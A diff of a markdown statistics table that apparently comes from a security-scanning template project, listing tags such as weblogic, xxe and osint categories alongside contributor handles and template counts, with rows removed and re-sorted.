+| osint-shopping | 24 | shine | 5 | | | | | | |
+| osint-finance | 24 | ganofins | 5 | | | | | | |
+| dns | 24 | prajiteshsingh | 5 | | | | | | |
+| osint-business | 24 | lucky0x0d | 5 | | | | | | |
+| osint-images | 24 | mr-xn | 5 | | | | | | |
+| admin | 23 | podalirius | 5 | | | | | | |
+| audit | 23 | yanyun | 5 | | | | | | |
+| stored-xss | 23 | robotshell | 5 | | | | | | |
+| xxe | 23 | arm!tage | 5 | | | | | | |
+| yonyou | 23 | pulsesecurity.co.nz | 4 | | | | | | |
+| file-upload | 23 | m4lwhere | 4 | | | | | | |
+| tomcat | 23 | heeress | 4 | | | | | | |
+| s3 | 22 | tanq16 | 4 | | | | | | |
+| cicd | 22 | shankar acharya | 4 | | | | | | |
+| github | 22 | scent2d | 4 | | | | | | |
+| prestashop | 22 | xxcdd | 4 | | | | | | |
+| weblogic | 21 | dadevel | 4 | | | | | | |
+| printer | 21 | wisnupramoedya | 4 | | | | | | |
+| ecology | 21 | dolev farhi | 4 | | | | | | |
+| dast | 21 | lum8rjack | 4 | | | | | | |
| msf | 21 | king-alexander | 4 | | | | | | |
-| weblogic | 21 | 3th1c_yuk1 | 4 | | | | | | |
-| github | 21 | dolev farhi | 4 | | | | | | |
-| dast | 21 | m4lwhere | 4 | | | | | | |
-| jenkins | 20 | h1ei1 | 4 | | | | | | |
-| camera | 20 | ggranjus | 4 | | | | | | |
-| hp | 19 | incogbyte | 4 | | | | | | |
-| rukovoditel | 19 | tanq16 | 4 | | | | | | |
-| ftp | 19 | shankar acharya | 4 | | | | | | |
-| grafana | 19 | nybble04 | 4 | | | | | | |
-| wavlink | 19 | k0pak4 | 4 | | | | | | |
-| struts | 19 | xxcdd | 4 | | | | | | |
-| cve2011 | 18 | ice3man543 | 4 | | | | | | |
-| coldfusion | 18 | heeress | 4 | | | | | | |
-| osint-music | 18 | e_schultze_ | 4 | | | | | | |
-| android | 18 | pulsesecurity.co.nz | 4 | | | | | | |
-| ruijie | 18 | dadevel | 4 | | | | | | |
-| prestashop | 18 | jpg0mez | 4 | | | | | | |
-| node.js | 17 | f1tz | 3 | | | | | | |
-| azure | 17 | yuzhe-zhang-0 | 3 | | | | | | |
-| service | 17 | xianke | 3 | | | | | | |
-| nginx | 17 | binaryfigments | 3 | | | | | | |
-| confluence | 17 | yash anand @yashanand155 | 3 | | | | | | |
-| rconfig | 16 | _generic_human_ | 3 | | | | | | |
+| jenkins | 20 | iamnooob | 4 | | | | | | |
+| camera | 20 | nybble04 | 4 | | | | | | |
+| rukovoditel | 19 | jpg0mez | 4 | | | | | | |
+| ftp | 19 | 0xr2r | 4 | | | | | | |
+| struts | 19 | ggranjus | 4 | | | | | | |
+| wavlink | 19 | e_schultze_ | 4 | | | | | | |
+| hp | 19 | ice3man543 | 4 | | | | | | |
+| grafana | 19 | k0pak4 | 4 | | | | | | |
+| android | 18 | 3th1c_yuk1 | 4 | | | | | | |
+| cve2011 | 18 | incogbyte | 4 | | | | | | |
+| osint-music | 18 | h1ei1 | 4 | | | | | | |
+| ruijie | 18 | cookiehanhoan | 4 | | | | | | |
+| coldfusion | 18 | unstabl3 | 3 | | | | | | |
+| vpn | 17 | splint3r7 | 3 | | | | | | |
+| confluence | 17 | swissky | 3 | | | | | | |
+| azure | 17 | z3bd | 3 | | | | | | |
+| honeypot | 17 | skeltavik | 3 | | | | | | |
+| nginx | 17 | flx | 3 | | | | | | |
+| node.js | 17 | binaryfigments | 3 | | | | | | |
+| service | 17 | true13 | 3 | | | | | | |
+| mail | 17 | evergreencartoons | 3 | | | | | | |
+| microweber | 16 | randomrobbie | 3 | | | | | | |
+| cve2009 | 16 | emenalf | 3 | | | | | | |
+| jarm | 16 | e1a | 3 | | | | | | |
+| status | 16 | j3ssie | 3 | | | | | | |
| alibaba | 16 | jarijaas | 3 | | | | | | |
-| status | 16 | ambassify | 3 | | | | | | |
-| honeypot | 16 | bernardofsr | 3 | | | | | | |
-| microweber | 16 | canberbamber | 3 | | | | | | |
-| cve2009 | 16 | shifacyclewala | 3 | | | | | | |
-| osint-blog | 16 | farish | 3 | | | | | | |
-| jarm | 16 | fyoorer | 3 | | | | | | |
-| mail | 16 | whoever | 3 | | | | | | |
-| backup | 16 | splint3r7 | 3 | | | | | | |
-| cve2008 | 15 | ekrause | 3 | | | | | | |
-| magento | 15 | vsh00t | 3 | | | | | | |
-| seeyon | 15 | evergreencartoons | 3 | | | | | | |
-| bypass | 15 | fxploit | 3 | | | | | | |
-| cve2013 | 15 | e1a | 3 | | | | | | |
-| nodejs | 15 | skeltavik | 3 | | | | | | |
-| zyxel | 15 | cheesymoon | 3 | | | | | | |
-| vpn | 15 | imjust0 | 3 | | | | | | |
-| java | 15 | dr0pd34d | 3 | | | | | | |
-| ruby | 15 | huowuzhao | 3 | | | | | | |
-| cnvd2021 | 15 | parth | 3 | | | | | | |
-| tongda | 15 | andydoering | 3 | | | | | | |
-| woocommerce | 15 | vagnerd | 3 | | | | | | |
-| creds-stuffing | 14 | 0w4ys | 3 | | | | | | |
-| osint-health | 14 | swissky | 3 | | | | | | |
-| nagios | 14 | emenalf | 3 | | | | | | |
-| docker | 14 | taielab | 3 | | | | | | |
-| dell | 14 | lucasljm2001 | 3 | | | | | | |
-| login-check | 14 | z3bd | 3 | | | | | | |
-| node | 14 | isacaya | 3 | | | | | | |
-| redis | 14 | dudez | 3 | | | | | | |
-| npm | 14 | atomiczsec | 3 | | | | | | |
-| dashboard | 14 | matt galligan | 3 | | | | | | |
-| headless | 14 | ph33r | 3 | | | | | | |
-| domainmod | 14 | unstabl3 | 3 | | | | | | |
-| backdoor | 14 | arcc | 3 | | | | | | |
-| redhat | 14 | mavericknerd | 3 | | | | | | |
-| smtp | 14 | j3ssie | 3 | | | | | | |
-| icewarp | 14 | johnjhacking | 3 | | | | | | |
-| jboss | 14 | impramodsargar | 3 | | | | | | |
-| auth | 14 | me9187 | 3 | | | | | | |
-| smb | 14 | coldfish | 3 | | | | | | |
-| osint-art | 14 | randomrobbie | 3 | | | | | | |
-| windows | 14 | flx | 3 | | | | | | |
-| abstractapi | 13 | true13 | 3 | | | | | | |
-| setup | 13 | aringo | 3 | | | | | | |
-| netgear | 13 | davidmckennirey | 3 | | | | | | |
-| osint-political | 13 | thomas_from_offensity | 3 | | | | | | |
-| postgresql | 13 | badboycxcc | 3 | | | | | | |
-| ssti | 13 | sushantkamble | 3 | | | | | | |
-| laravel | 13 | lark-lab | 3 | | | | | | |
-| osint-dating | 13 | alifathi-h1 | 3 | | | | | | |
-| fortigate | 13 | ayadim | 2 | | | | | | |
-| hashicorp | 13 | brucelsone | 2 | | | | | | |
-| rails | 13 | gevakun | 2 | | | | | | |
-| git | 13 | christianpoeschl | 2 | | | | | | |
-| ivanti | 13 | shankaracharya | 2 | | | | | | |
-| cuppa | 13 | socketz | 2 | | | | | | |
-| sonicwall | 13 | geekby | 2 | | | | | | |
-| cuppacms | 13 | danielmofer | 2 | | | | | | |
-| airflow | 13 | 6mile | 2 | | | | | | |
-| mysql | 13 | supras | 2 | | | | | | |
-| graphql | 13 | uomogrande | 2 | | | | | | |
-| zimbra | 12 | lotusdll | 2 | | | | | | |
-| webserver | 12 | paperpen | 2 | | | | | | |
-| doppler | 12 | hetroublemakr | 2 | | | | | | |
-| kafka | 12 | kre80r | 2 | | | | | | |
-| netsweeper | 12 | vavkamil | 2 | | | | | | |
-| ofbiz | 12 | martincodes-de | 2 | | | | | | |
-| drupal | 12 | pxmme1337 | 2 | | | | | | |
-| moosocial | 12 | streetofhackerr007 | 2 | | | | | | |
-| newrelic | 12 | bp0lr | 2 | | | | | | |
-| vbulletin | 11 | w4cky_ | 2 | | | | | | |
-| phpmyadmin | 11 | hackerarpan | 2 | | | | | | |
-| django | 11 | wa1tf0rme | 2 | | | | | | |
-| jolokia | 11 | kazgangap | 2 | | | | | | |
-| spring | 11 | bananabr | 2 | | | | | | |
-| jetbrains | 11 | ree4pwn | 2 | | | | | | |
-| phpgurukul | 11 | v0idc0de | 2 | | | | | | |
-| fastjson | 11 | danmcinerney | 2 | | | | | | |
-| online_fire_reporting_system_project | 11 | afaq | 2 | | | | | | |
-| iis | 11 | salts | 2 | | | | | | |
-| xstream | 11 | joshua rogers | 2 | | | | | | |
-| online-fire-reporting | 11 | n-thumann | 2 | | | | | | |
-| osint-video | 11 | arliya | 2 | | | | | | |
-| solarview | 10 | liwermor | 2 | | | | | | |
-| dedecms | 10 | d4vy | 2 | | | | | | |
-| digitalocean | 10 | joshlarsen | 2 | | | | | | |
-| db | 10 | supr4s | 2 | | | | | | |
-| hikvision | 10 | mzack9999 | 2 | | | | | | |
-| cache | 10 | mahendra purbia (mah3sec_) | 2 | | | | | | |
-| thinkphp | 10 | bing0o | 2 | | | | | | |
-| symfony | 10 | 0xcrypto | 2 | | | | | | |
-| xstream_project | 10 | clarkvoss | 2 | | | | | | |
-| glpi | 10 | myztique | 2 | | | | | | |
-| zabbix | 10 | dogancanbakir | 2 | | | | | | |
-| installer | 10 | mrharshvardhan | 2 | | | | | | |
-| info-leak | 10 | sbani | 2 | | | | | | |
-| prometheus | 10 | foulenzer | 2 | | | | | | |
-| solr | 10 | thevillagehacker | 2 | | | | | | |
-| samsung | 10 | 0xrudra | 2 | | | | | | |
-| elasticsearch | 10 | sy3omda | 2 | | | | | | |
-| dropbox | 10 | shelled | 2 | | | | | | |
-| sitecore | 10 | zomsop82 | 2 | | | | | | |
-| vcenter | 9 | sinkettu | 2 | | | | | | |
-| lucee | 9 | maximus decimus | 2 | | | | | | |
-| secret | 9 | dheerajmadhukar | 2 | | | | | | |
-| scada | 9 | ep1csage | 2 | | | | | | |
-| bitbucket | 9 | thardt-praetorian | 2 | | | | | | |
-| instrusive | 9 | cristi vlad (@cristivlad25) | 2 | | | | | | |
-| kube | 9 | c3l3si4n | 2 | | | | | | |
-| python | 9 | moritz nentwig | 2 | | | | | | |
-| dahua | 9 | y4er | 2 | | | | | | |
-| firebase | 9 | nvn1729 | 2 | | | | | | |
-| elastic | 9 | paradessia | 2 | | | | | | |
-| blind | 9 | 8arthur | 2 | | | | | | |
-| sangfor | 9 | mohammedsaneem | 2 | | | | | | |
-| druid | 9 | raesene | 2 | | | | | | |
-| sophos | 9 | 0xsmiley | 2 | | | | | | |
-| pfsense | 9 | israel comazzetto dos reis | 2 | | | | | | |
-| moodle | 9 | dbrwsky | 2 | | | | | | |
-| wso2 | 9 | bmcel | 2 | | | | | | |
-| crlf | 9 | 0xsapra | 2 | | | | | | |
-| opencats | 9 | zy9ard3 | 2 | | | | | | |
-| exchange | 9 | manas_harsh | 2 | | | | | | |
-| gitea | 9 | k11h-de | 2 | | | | | | |
-| facebook | 9 | amsda | 2 | | | | | | |
-| versa | 9 | cocxanh | 2 | | | | | | |
-| artica | 9 | luci | 2 | | | | | | |
-| cnvd2020 | 9 | bsysop | 2 | | | | | | |
-| error | 8 | 0xelkomy | 2 | | | | | | |
-| spotweb_project | 8 | codexlynx | 2 | | | | | | |
-| osint-news | 8 | github.com/its0x08 | 2 | | | | | | |
-| odoo | 8 | korteke | 2 | | | | | | |
-| phpjabbers | 8 | convisoappsec | 2 | | | | | | |
-| spotweb | 8 | rafaelwdornelas | 2 | | | | | | |
-| console | 8 | ehsahil | 2 | | | | | | |
-| phpinfo | 8 | msegoviag | 2 | | | | | | |
-| cloud-enum | 8 | ricardo maia (brainfork) | 2 | | | | | | |
-| symantec | 8 | z0ne | 2 | | | | | | |
-| mirai | 8 | gal nagli | 2 | | | | | | |
-| config-audit | 8 | thezakman | 2 | | | | | | |
-| huawei | 8 | charles d. | 2 | | | | | | |
-| default-page | 8 | h0j3n | 2 | | | | | | |
-| unauthenticated | 8 | notnotnotveg | 2 | | | | | | |
-| progress | 8 | nkxxkn | 2 | | | | | | |
-| emerge | 8 | koti2 | 2 | | | | | | |
-| manager | 8 | sascha brendel | 2 | | | | | | |
-| oauth | 8 | c4sper0 | 2 | | | | | | |
-| go | 8 | udit_thakkur | 2 | | | | | | |
-| mlflow | 8 | davidegirardi | 2 | | | | | | |
-| discord | 8 | 666asd | 2 | | | | | | |
-| cisco-switch | 8 | joeldeleep | 2 | | | | | | |
-| wanhu | 8 | nuk3s3c | 2 | | | | | | |
-| bucket | 8 | parzival | 2 | | | | | | |
-| e-office | 8 | usdag | 2 | | | | | | |
-| hms | 8 | redteambrasil | 2 | | | | | | |
-| metadata | 8 | 0xnirvana | 2 | | | | | | |
-| atom | 8 | g4l1t0 | 2 | | | | | | |
-| ognl | 8 | florianmaak | 2 | | | | | | |
-| recon | 8 | randomdhiraj | 2 | | | | | | |
-| monstra | 7 | michal mikolas (nanuqcz) | 2 | | | | | | |
-| telesquare | 7 | thabisocn | 2 | | | | | | |
-| filemanager | 7 | x1m_martijn | 2 | | | | | | |
-| cacti | 7 | brenocss | 2 | | | | | | |
-| linkedin | 7 | herry | 2 | | | | | | |
-| nagiosxi | 7 | kiblyn11 | 2 | | | | | | |
-| car_rental_management_system_project | 7 | cckuakilong | 2 | | | | | | |
-| f5 | 7 | dahse89 | 2 | | | | | | |
-| bigip | 7 | kishore-hariram | 2 | | | | | | |
-| rfi | 7 | ajaysenr | 2 | | | | | | |
-| avtech | 7 | archer | 1 | | | | | | |
-| nacos | 7 | caon | 1 | | | | | | |
-| websphere | 7 | imhunterand | 1 | | | | | | |
-| ruckus | 7 | mass0ma | 1 | | | | | | |
-| nexus | 7 | lbb | 1 | | | | | | |
-| bloofox | 7 | ramondunker | 1 | | | | | | |
-| nortekcontrol | 7 | tirtha | 1 | | | | | | |
-| oos | 7 | nuts7 | 1 | | | | | | |
-| squirrelmail | 7 | lstatro | 1 | | | | | | |
-| keking | 7 | ooooooo_q | 1 | | | | | | |
-| opensis | 7 | mlec | 1 | | | | | | |
-| fpd | 7 | twitter.com/dheerajmadhukar | 1 | | | | | | |
-| activemq | 7 | remi gascou (podalirius) | 1 | | | | | | |
-| pmb | 7 | aron molnar | 1 | | | | | | |
-| gogs | 7 | stupidfish | 1 | | | | | | |
-| moodating | 7 | erethon | 1 | | | | | | |
-| blockchain | 7 | invisiblethreat | 1 | | | | | | |
-| joomla\! | 7 | oscarintherocks | 1 | | | | | | |
-| database | 7 | eremit4 | 1 | | | | | | |
-| fortios | 7 | shreyapohekar | 1 | | | | | | |
-| twitter | 7 | allenwest24 | 1 | | | | | | |
-| ec2 | 7 | couskito | 1 | | | | | | |
-| solarwinds | 7 | therealtoastycat | 1 | | | | | | |
-| shopify | 7 | erikowen | 1 | | | | | | |
-| contec | 7 | ap3r | 1 | | | | | | |
-| exploitdb | 7 | elouhi | 1 | | | | | | |
-| maps | 7 | willd96 | 1 | | | | | | |
-| landray | 7 | sdcampbell | 1 | | | | | | |
-| slack | 7 | omarkurt | 1 | | | | | | |
-| vms | 7 | lingtren | 1 | | | | | | |
-| mobileiron | 7 | vzamanillo | 1 | | | | | | |
-| elfinder | 6 | team syslifters / christoph | 1 | | | | | | |
-| | | mahrl | | | | | | | |
-| doctor-appointment-system | 6 | topscoder | 1 | | | | | | |
-| kubelet | 6 | udyz | 1 | | | | | | |
-| liferay | 6 | act1on3 | 1 | | | | | | |
-| leak | 6 | aaronchen0 | 1 | | | | | | |
-| sonarqube | 6 | 2rs3c | 1 | | | | | | |
-| log | 6 | rojanrijal | 1 | | | | | | |
-| mongodb | 6 | 0xtavian | 1 | | | | | | |
-| asp | 6 | kailashbohara | 1 | | | | | | |
-| jeecg | 6 | sec_hawk | 1 | | | | | | |
-| paypal | 6 | juliosmelo | 1 | | | | | | |
-| advantech | 6 | sid ahmed malaoui @ realistic | 1 | | | | | | |
-| | | security | | | | | | | |
-| synacor | 6 | af001 | 1 | | | | | | |
-| couchdb | 6 | vinit989 | 1 | | | | | | |
-| servicenow | 6 | micha3lb3n | 1 | | | | | | |
-| 74cms | 6 | iampritam | 1 | | | | | | |
-| jetty | 6 | compr00t | 1 | | | | | | |
-| vrealize | 6 | hlop | 1 | | | | | | |
-| flutterwave | 6 | cravaterouge | 1 | | | | | | |
-| geoserver | 6 | jcockhren | 1 | | | | | | |
-| plesk | 6 | momen eldawakhly | 1 | | | | | | |
-| cobbler | 6 | 0xrod | 1 | | | | | | |
-| webmin | 6 | paper-pen | 1 | | | | | | |
-| lfprojects | 6 | 0xteles | 1 | | | | | | |
-| minio | 6 | mordavid | 1 | | | | | | |
-| doctor_appointment_system_project | 6 | igibanez | 1 | | | | | | |
-| rat | 6 | shiar | 1 | | | | | | |
-| chanjet | 6 | patralos | 1 | | | | | | |
-| teamcity | 6 | kba@sogeti_esec | 1 | | | | | | |
-| express | 6 | shiva (strobes security) | 1 | | | | | | |
-| keycloak | 6 | husain | 1 | | | | | | |
-| sql | 6 | jaskaran | 1 | | | | | | |
-| magmi | 6 | absshax | 1 | | | | | | |
-| openvpn | 6 | regala_ | 1 | | | | | | |
-| s3 | 6 | ky9oss | 1 | | | | | | |
-| microfocus | 6 | jrolf | 1 | | | | | | |
-| cockpit | 6 | rotemreiss | 1 | | | | | | |
-| gcp | 6 | nerrorsec | 1 | | | | | | |
-| jamf | 6 | aringo-bf | 1 | | | | | | |
-| microstrategy | 6 | savik | 1 | | | | | | |
-| zhiyuan | 6 | chetgan | 1 | | | | | | |
-| typo3 | 6 | elmahdi | 1 | | | | | | |
-| tikiwiki | 6 | william söderberg @ withsecure | 1 | | | | | | |
-| nuuo | 5 | pascalheidmann | 1 | | | | | | |
-| cloudflare | 5 | tim_koopmans | 1 | | | | | | |
-| mikrotik | 5 | ofjaaah | 1 | | | | | | |
-| agentejo | 5 | w8ay | 1 | | | | | | |
-| decision-center | 5 | higor melgaço | 1 | | | | | | |
-| qnap | 5 | harshinsecurity | 1 | | | | | | |
-| vehicle_service_management_system_project | 5 | rivalsec | 1 | | | | | | |
-| wbce | 5 | udinchan | 1 | | | | | | |
-| connectwise | 5 | qlkwej | 1 | | | | | | |
-| caucho | 5 | ph33rr | 1 | | | | | | |
-| tenda | 5 | charanrayudu | 1 | | | | | | |
-| axigen | 5 | daviey | 1 | | | | | | |
-| sysaid | 5 | jteles | 1 | | | | | | |
-| chamilo | 5 | ohlinge | 1 | | | | | | |
-| beyondtrust | 5 | drfabiocastro | 1 | | | | | | |
-| webview | 5 | hateshape | 1 | | | | | | |
-| ldap | 5 | vikas kundu | 1 | | | | | | |
-| redmine | 5 | jeya seelan | 1 | | | | | | |
-| voip | 5 | xc1ym | 1 | | | | | | |
-| jupyter | 5 | j3ssie/geraldino2 | 1 | | | | | | |
-| jabber | 5 | jbaines-r7 | 1 | | | | | | |
-| bmc | 5 | 0xd0ff9 | 1 | | | | | | |
-| akamai | 5 | christbowel | 1 | | | | | | |
-| asana | 5 | httpvoid | 1 | | | | | | |
-| genetechsolutions | 5 | ivo palazzolo (@palaziv) | 1 | | | | | | |
-| dionaea | 5 | h4sh5 | 1 | | | | | | |
-| paloaltonetworks | 5 | 5up3r541y4n | 1 | | | | | | |
-| schneider-electric | 5 | t3l3machus | 1 | | | | | | |
-| openemr | 5 | deena | 1 | | | | | | |
-| parallels | 5 | mchklt | 1 | | | | | | |
-| apisix | 5 | ahmed abou-ela | 1 | | | | | | |
-| firmware | 5 | xeldax | 1 | | | | | | |
-| adminer | 5 | yaser_s | 1 | | | | | | |
-| percha | 5 | pjborah | 1 | | | | | | |
-| react | 5 | ahmetpergamum | 1 | | | | | | |
-| openai | 5 | myst7ic | 1 | | | | | | |
-| sftp | 5 | kishore krishna (sillydaddy) | 1 | | | | | | |
-| cve2007 | 5 | adilsoybali | 1 | | | | | | |
-| jwt | 5 | th3.d1p4k | 1 | | | | | | |
-| ethereum | 5 | piyushchhiroliya | 1 | | | | | | |
-| xmlrpc | 5 | kabirsuda | 1 | | | | | | |
-| totolink | 5 | tea | 1 | | | | | | |
-| circontrol | 5 | y0no | 1 | | | | | | |
-| 10web | 5 | byobin | 1 | | | | | | |
-| gocd | 5 | denandz | 1 | | | | | | |
-| strapi | 5 | dali | 1 | | | | | | |
-| ems | 5 | amirmsafari | 1 | | | | | | |
-| web3 | 5 | sak1 | 1 | | | | | | |
-| adb | 5 | akokonunes | 1 | | | | | | |
-| glpi-project | 5 | borna nematzadeh | 1 | | | | | | |
-| storage | 5 | m0ck3d | 1 | | | | | | |
-| graylog | 5 | exceed | 1 | | | | | | |
-| rseenet | 5 | alex | 1 | | | | | | |
-| zzzcms | 5 | smaranchand | 1 | | | | | | |
-| goanywhere | 5 | droberson | 1 | | | | | | |
-| square | 5 | bugvsme | 1 | | | | | | |
-| carrental | 5 | ayadi | 1 | | | | | | |
-| thedigitalcraft | 5 | sospiro | 1 | | | | | | |
-| swagger | 5 | hakimkt | 1 | | | | | | |
-| pyload | 5 | makyotox | 1 | | | | | | |
-| hpe | 5 | unknown | 1 | | | | | | |
-| matrix | 5 | unp4ck | 1 | | | | | | |
-| hybris | 5 | luqmaan hadia | 1 | | | | | | |
-| | | [luqiih](https://github.com/luqiih) | | | | | | | |
-| avideo | 5 | manasmbellani | 1 | | | | | | |
-| circarlife | 5 | hanlaomo | 1 | | | | | | |
-| avaya | 5 | aravind | 1 | | | | | | |
-| fatpipe | 5 | mbmy | 1 | | | | | | |
-| metinfo | 5 | godfatherorwa | 1 | | | | | | |
-| gateway | 5 | aayush vishnoi | 1 | | | | | | |
-| mssql | 5 | adrianmf | 1 | | | | | | |
-| splunk | 5 | pphuahua | 1 | | | | | | |
-| papercut | 5 | sicksec | 1 | | | | | | |
-| magmi_project | 5 | ok_bye_now | 1 | | | | | | |
-| openstack | 5 | cbadke | 1 | | | | | | |
-| sentry | 5 | luciannitescu | 1 | | | | | | |
-| terramaster | 5 | akash.c | 1 | | | | | | |
-| server | 5 | aceseven (digisec360) | 1 | | | | | | |
-| kkfileview | 5 | iphantasmic | 1 | | | | | | |
-| cnvd2023 | 5 | sinsinology | 1 | | | | | | |
-| elementor | 5 | queencitycyber | 1 | | | | | | |
-| awstats | 5 | thirukrishnan | 1 | | | | | | |
-| resin | 5 | lady_bug | 1 | | | | | | |
-| craftcms | 5 | x6263 | 1 | | | | | | |
-| metabase | 4 | luqman | 1 | | | | | | |
-| auieo | 4 | technicaljunkie | 1 | | | | | | |
-| yeswiki | 4 | phillipo | 1 | | | | | | |
-| rubyonrails | 4 | tehtbl | 1 | | | | | | |
-| pluginus | 4 | amnotacat | 1 | | | | | | |
-| powerjob | 4 | xcapri | 1 | | | | | | |
-| webshell | 4 | viniciuspereiras | 1 | | | | | | |
-| royalevent | 4 | unblvr1 | 1 | | | | | | |
-| ebs | 4 | sorrowx3 | 1 | | | | | | |
-| easypost | 4 | prettyboyaaditya | 1 | | | | | | |
-| casaos | 4 | zinminphy0 | 1 | | | | | | |
-| pip | 4 | furkansenan | 1 | | | | | | |
-| linkerd | 4 | ilovebinbash | 1 | | | | | | |
-| newstatpress_project | 4 | jiheon-dev | 1 | | | | | | |
-| seagate | 4 | noobexploiter | 1 | | | | | | |
-| dom | 4 | tirtha_mandal | 1 | | | | | | |
-| photo | 4 | manuelbua | 1 | | | | | | |
-| purchase_order_management_system_project | 4 | clment cruchet | 1 | | | | | | |
-| nosqli | 4 | justmumu | 1 | | | | | | |
-| env | 4 | fpatrik | 1 | | | | | | |
-| froxlor | 4 | sickwell | 1 | | | | | | |
-| dolibarr | 4 | becivells | 1 | | | | | | |
-| joomlamo | 4 | francescocarlucci | 1 | | | | | | |
-| arcgis | 4 | zhenwarx | 1 | | | | | | |
-| bittrex | 4 | 0xceeb | 1 | | | | | | |
-| osgeo | 4 | akshansh | 1 | | | | | | |
-| jorani | 4 | danigoland | 1 | | | | | | |
-| stripe | 4 | null_hypothesis | 1 | | | | | | |
-| phpjabber | 4 | 0xceba | 1 | | | | | | |
-| linksys | 4 | realexp3rt | 1 | | | | | | |
-| wcs | 4 | kurohost | 1 | | | | | | |
-| webmail | 4 | chesterblue | 1 | | | | | | |
-| figma | 4 | open-sec | 1 | | | | | | |
-| salesforce | 4 | pepitoh | 1 | | | | | | |
-| pmb_project | 4 | jna1 | 1 | | | | | | |
-| jsf | 4 | dale clarke | 1 | | | | | | |
-| bitrix | 4 | dabla | 1 | | | | | | |
-| digitaldruid | 4 | kchason | 1 | | | | | | |
-| gnuboard | 4 | narluin | 1 | | | | | | |
-| terra-master | 4 | push4d | 1 | | | | | | |
-| os4ed | 4 | whynotke | 1 | | | | | | |
-| kyocera | 4 | brabbit10 | 1 | | | | | | |
-| http | 4 | dmartyn | 1 | | | | | | |
-| sendgrid | 4 | none | 1 | | | | | | |
-| prtg | 4 | dwbzn | 1 | | | | | | |
-| openfire | 4 | mukundbhuva | 1 | | | | | | |
-| rocketchat | 4 | d0rkerdevil | 1 | | | | | | |
-| artifactory | 4 | mhdsamx | 1 | | | | | | |
-| panos | 4 | ldionmarcil | 1 | | | | | | |
-| articatech | 4 | galoget | 1 | | | | | | |
-| kingsoft | 4 | barthy.koeln | 1 | | | | | | |
-| tiki | 4 | hczdmr | 1 | | | | | | |
-| nextjs | 4 | jub0bs | 1 | | | | | | |
-| igniterealtime | 4 | unkl4b | 1 | | | | | | |
-| reprisesoftware | 4 | 0ut0fb4nd | 1 | | | | | | |
-| shiro | 4 | exploitation | 1 | | | | | | |
-| linuxfoundation | 4 | pudsec | 1 | | | | | | |
-| hongfan | 4 | shockwave | 1 | | | | | | |
-| age-encryption | 4 | evolutionsec | 1 | | | | | | |
-| heroku | 4 | guax1 | 1 | | | | | | |
-| zte | 4 | arr0way | 1 | | | | | | |
-| candidats | 4 | screamy | 1 | | | | | | |
-| sound4 | 4 | ahmed sherif | 1 | | | | | | |
-| learnpress | 4 | kresec | 1 | | | | | | |
-| jellyfin | 4 | hotpot | 1 | | | | | | |
-| springcloud | 4 | breno_css | 1 | | | | | | |
-| harbor | 4 | soyelmago | 1 | | | | | | |
-| finicity | 4 | andysvints | 1 | | | | | | |
-| dropbear | 4 | miroslavsotak | 1 | | | | | | |
-| mailchimp | 4 | hardik-rathod | 1 | | | | | | |
-| aura | 4 | josecosta | 1 | | | | | | |
-| flatpress | 4 | viondexd | 1 | | | | | | |
-| mostracms | 4 | arjunchandarana | 1 | | | | | | |
-| cve2005 | 4 | w0tx | 1 | | | | | | |
-| cnvd2022 | 4 | yusakie | 1 | | | | | | |
-| sugarcrm | 4 | r3s ost | 1 | | | | | | |
-| hospital_management_system_project | 4 | ringo | 1 | | | | | | |
-| wireguard | 4 | orpheus | 1 | | | | | | |
-| osint-archived | 4 | amir-h-fallahi | 1 | | | | | | |
-| telerik | 4 | ratnadip gajbhiye | 1 | | | | | | |
-| ampache | 4 | gonski | 1 | | | | | | |
-| rabbitmq | 4 | marcos_iaf | 1 | | | | | | |
-| eclipse | 4 | f1she3 | 1 | | | | | | |
-| okta | 4 | pratik khalane | 1 | | | | | | |
-| thinkcmf | 4 | 0xelkomy & c0nqr0r | 1 | | | | | | |
-| centos | 4 | retr0 | 1 | | | | | | |
-| pega | 4 | am0nt31r0 | 1 | | | | | | |
-| panabit | 4 | higor melgaço (eremit4) | 1 | | | | | | |
-| datadog | 4 | alperenkesk | 1 | | | | | | |
-| codeigniter | 4 | th3r4id | 1 | | | | | | |
-| confluent | 4 | blckraven | 1 | | | | | | |
-| zend | 4 | jaimin gondaliya | 1 | | | | | | |
-| owncloud | 4 | olewagner | 1 | | | | | | |
-| fit2cloud | 4 | failopen | 1 | | | | | | |
-| horde | 4 | matthew nickerson (b0than) @ | 1 | | | | | | |
+| backup | 16 | whoever | 3 | | | | | | |
+| rconfig | 16 | sushantkamble | 3 | | | | | | |
+| magento | 16 | cheesymoon | 3 | | | | | | |
+| osint-blog | 16 | matt galligan | 3 | | | | | | |
+| woocommerce | 15 | me9187 | 3 | | | | | | |
+| cve2013 | 15 | _generic_human_ | 3 | | | | | | |
+| ssti | 15 | johnjhacking | 3 | | | | | | |
+| setup | 15 | salts | 3 | | | | | | |
+| nodejs | 15 | badboycxcc | 3 | | | | | | |
+| tongda | 15 | aringo | 3 | | | | | | |
+| cnvd2021 | 15 | dr0pd34d | 3 | | | | | | |
+| seeyon | 15 | fyoorer | 3 | | | | | | |
+| bypass | 15 | andydoering | 3 | | | | | | |
+| installer | 15 | farish | 3 | | | | | | |
+| backdoor | 15 | ph33r | 3 | | | | | | |
+| cve2008 | 15 | taielab | 3 | | | | | | |
+| ruby | 15 | dudez | 3 | | | | | | |
+| zyxel | 15 | c4sper0 | 3 | | | | | | |
+| dashboard | 15 | fxploit | 3 | | | | | | |
+| java | 15 | alifathi-h1 | 3 | | | | | | |
+| moosocial | 15 | 0w4ys | 3 | | | | | | |
+| headless | 14 | isacaya | 3 | | | | | | |
+| creds-stuffing | 14 | imjust0 | 3 | | | | | | |
+| docker | 14 | bernardofsr | 3 | | | | | | |
+| windows | 14 | shifacyclewala | 3 | | | | | | |
+| smb | 14 | yash anand @yashanand155 | 3 | | | | | | |
+| login-check | 14 | xianke | 3 | | | | | | |
+| npm | 14 | arcc | 3 | | | | | | |
+| rds | 14 | atomiczsec | 3 | | | | | | |
+| nagios | 14 | yuzhe-zhang-0 | 3 | | | | | | |
+| redis | 14 | impramodsargar | 3 | | | | | | |
+| jboss | 14 | f1tz | 3 | | | | | | |
+| icewarp | 14 | huowuzhao | 3 | | | | | | |
+| git | 14 | vsh00t | 3 | | | | | | |
+| domainmod | 14 | lucasljm2001 | 3 | | | | | | |
+| osint-art | 14 | ambassify | 3 | | | | | | |
+| node | 14 | coldfish | 3 | | | | | | |
+| redhat | 14 | parth | 3 | | | | | | |
+| auth | 14 | ekrause | 3 | | | | | | |
+| smtp | 14 | lark-lab | 3 | | | | | | |
+| osint-health | 14 | mavericknerd | 3 | | | | | | |
